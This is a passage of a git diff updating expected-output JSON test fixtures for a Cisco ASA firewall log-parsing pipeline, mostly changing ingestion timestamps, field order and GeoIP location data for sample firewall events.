CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996324500Z", + "ingested": "2021-12-14T14:38:25.939031767Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996330700Z", + "ingested": "2021-12-14T14:38:25.939032234Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json index c9de8beac99..3496a4bf5aa 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json @@ -1,34 +1,6 @@ { "expected": [ { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", @@ -43,9 +15,28 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.339875200Z", + "ingested": "2021-12-14T14:39:01.110774009Z", "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", @@ -68,7 +59,10 @@ "dap_2" ] } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index cab2b86a191..9be3b6ff122 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2021-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" @@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:34:15.509140500Z", + "ingested": "2021-12-14T14:39:01.276128469Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:34:15.509148700Z", + "ingested": "2021-12-14T14:39:01.276131408Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:15.509154300Z", + "ingested": "2021-12-14T14:39:01.276131827Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json index c0aa0eab790..0c3fa2cca20 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.786608700Z", + "ingested": "2021-12-14T14:39:01.600472142Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", @@ -107,7 +107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.786616300Z", + "ingested": "2021-12-14T14:39:01.600475201Z", "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 898640c4657..4b3295c6eb6 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:15.994818500Z", + "ingested": "2021-12-14T14:39:01.861495681Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.994826400Z", + "ingested": "2021-12-14T14:39:01.861497888Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:15.994831900Z", + "ingested": "2021-12-14T14:39:01.861498319Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 876d13e8e31..de916eee21e 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.394993200Z", + "ingested": "2021-12-14T14:39:02.289529776Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395002200Z", + "ingested": "2021-12-14T14:39:02.289532045Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395008300Z", + "ingested": "2021-12-14T14:39:02.289532517Z", "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395031600Z", + "ingested": "2021-12-14T14:39:02.289532906Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395053100Z", + "ingested": "2021-12-14T14:39:02.289533321Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395058800Z", + "ingested": "2021-12-14T14:39:02.289533702Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395064300Z", + "ingested": "2021-12-14T14:39:02.289534102Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395069800Z", + "ingested": "2021-12-14T14:39:02.289534481Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395075200Z", + "ingested": "2021-12-14T14:39:02.289534865Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395080600Z", + "ingested": "2021-12-14T14:39:02.289535253Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395086100Z", + "ingested": "2021-12-14T14:39:02.289535645Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:34:16.395092Z", + "ingested": "2021-12-14T14:39:02.289536275Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:34:16.395097700Z", + "ingested": "2021-12-14T14:39:02.289536687Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395103300Z", + "ingested": "2021-12-14T14:39:02.289537067Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395108700Z", + "ingested": "2021-12-14T14:39:02.289537458Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395114200Z", + "ingested": "2021-12-14T14:39:02.289537847Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395119800Z", + "ingested": "2021-12-14T14:39:02.289538392Z", "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395125300Z", + "ingested": "2021-12-14T14:39:02.289538792Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395130800Z", + "ingested": "2021-12-14T14:39:02.289539176Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395136200Z", + "ingested": "2021-12-14T14:39:02.289539564Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395141700Z", + "ingested": "2021-12-14T14:39:02.289539951Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395147Z", + "ingested": "2021-12-14T14:39:02.289540342Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395152900Z", + "ingested": "2021-12-14T14:39:02.289540737Z", "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395158500Z", + "ingested": "2021-12-14T14:39:02.289541233Z", "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395165900Z", + "ingested": "2021-12-14T14:39:02.289541624Z", "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395171200Z", + "ingested": "2021-12-14T14:39:02.289542029Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395176100Z", + "ingested": "2021-12-14T14:39:02.289542413Z", "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395181700Z", + "ingested": "2021-12-14T14:39:02.289542801Z", "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395187200Z", + "ingested": "2021-12-14T14:39:02.289543193Z", "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395192700Z", + "ingested": "2021-12-14T14:39:02.289543594Z", "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395198100Z", + "ingested": "2021-12-14T14:39:02.289543992Z", "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395203500Z", + "ingested": "2021-12-14T14:39:02.289544385Z", "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395208900Z", + "ingested": "2021-12-14T14:39:02.289544774Z", "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395214400Z", + "ingested": "2021-12-14T14:39:02.289545155Z", "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395220Z", + "ingested": "2021-12-14T14:39:02.289545680Z", "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395225400Z", + "ingested": "2021-12-14T14:39:02.289546068Z", "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395230900Z", + "ingested": "2021-12-14T14:39:02.289546466Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395236300Z", + "ingested": "2021-12-14T14:39:02.289546861Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395241700Z", + "ingested": "2021-12-14T14:39:02.289547255Z", "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395247200Z", + "ingested": "2021-12-14T14:39:02.289547638Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2863,7 +2863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395252700Z", + "ingested": "2021-12-14T14:39:02.289548028Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2936,7 +2936,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395258200Z", + "ingested": "2021-12-14T14:39:02.289548413Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3012,7 +3012,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395263600Z", + "ingested": "2021-12-14T14:39:02.289548801Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3090,7 +3090,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395269100Z", + "ingested": "2021-12-14T14:39:02.289549197Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3168,7 +3168,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:16.395274600Z", + "ingested": "2021-12-14T14:39:02.289549588Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3245,7 +3245,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:16.395280100Z", + "ingested": "2021-12-14T14:39:02.289549977Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3322,7 +3322,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:16.395285500Z", + "ingested": "2021-12-14T14:39:02.289550387Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3391,7 +3391,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395291100Z", + "ingested": "2021-12-14T14:39:02.289550779Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3457,7 +3457,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395296500Z", + "ingested": "2021-12-14T14:39:02.289551169Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3528,7 +3528,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395318800Z", + "ingested": "2021-12-14T14:39:02.289551558Z", "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3602,7 +3602,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395324800Z", + "ingested": "2021-12-14T14:39:02.289552047Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3678,7 +3678,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395330200Z", + "ingested": "2021-12-14T14:39:02.289552442Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3756,7 +3756,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:16.395335600Z", + "ingested": "2021-12-14T14:39:02.289552834Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:34:16.395341Z", + "ingested": "2021-12-14T14:39:02.289553220Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3896,7 +3896,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395346200Z", + "ingested": "2021-12-14T14:39:02.289553607Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -3960,7 +3960,7 @@ }, "event": 